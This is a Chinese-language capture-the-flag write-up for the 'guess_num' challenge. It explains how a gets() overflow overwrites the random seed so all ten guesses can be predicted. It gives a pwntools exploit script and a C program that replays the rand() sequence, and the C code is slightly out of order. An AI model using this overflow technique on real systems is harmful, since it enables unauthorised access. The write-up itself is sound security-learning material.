guess_num
这题很有趣(难 )
放Linux康康
好家伙保护直接加满了,这是个64位程序,放进ida64康康
这题关键在于gets和srand函数的作用
分析函数,srand是根据seed[0]随机生成数
这题要猜10次数字全对才能得到flag
接下来康康gets这个危险函数
思路是从v7下来把seed覆盖成为我们想要的值
在此之前,我们要写一个srand函数
from pwn import *
from ctypes import *
#引入c语言函数库
context(os = "linux" , arch = "amd64" , log_level = "debug")
content = 1
def srand():
#书写srand函数
lib = cdll.LoadLibrary("libc.so.6")
#链接动态函数库
lib.srand(1)
for i in range(10):
number = str(lib.rand()%6 + 1)
#生成数字
peiqi.recvuntil("Please input your guess number:")
peiqi.sendline(number)
def main():
global peiqi
try:
if content == 1:
peiqi = process("guess")
else:
peiqi = remote("220.249.52.133",43180)
payload = b"a" * (0x30-0x10)
payload = payload + p64(1)
peiqi.recvuntil("Your name:")
peiqi.sendline(payload)
srand()
peiqi.interactive()
main()
这是方法一,本质是用Python写c语言代码,不过要用到动态链接库,还要引入函数库
由此可以用到方法二,直接编写c语言,运行后直接得到要猜的数字,然后一个个输进去
有点偷懒,不过不用Python写srand了,只用写一段C语言代码‘
方法二
#include <stdio.h>
#include <stdlib.h>
生成的结果如下
这里我们使用的是'a'来做随机数的种子,所以在获取flag的时候也要用a将种子覆盖掉。按照上面生成的
顺序输入获得flag
int main()
{
srand(0x61616161);
//函数srand需要的种子
for (int i = 0; i < 10; i++)
{
int b = rand() % 6 + 1;
printf("%d\n", b);
}
system("pause");
return(0);
}
运行结果
然后执行脚本
get flag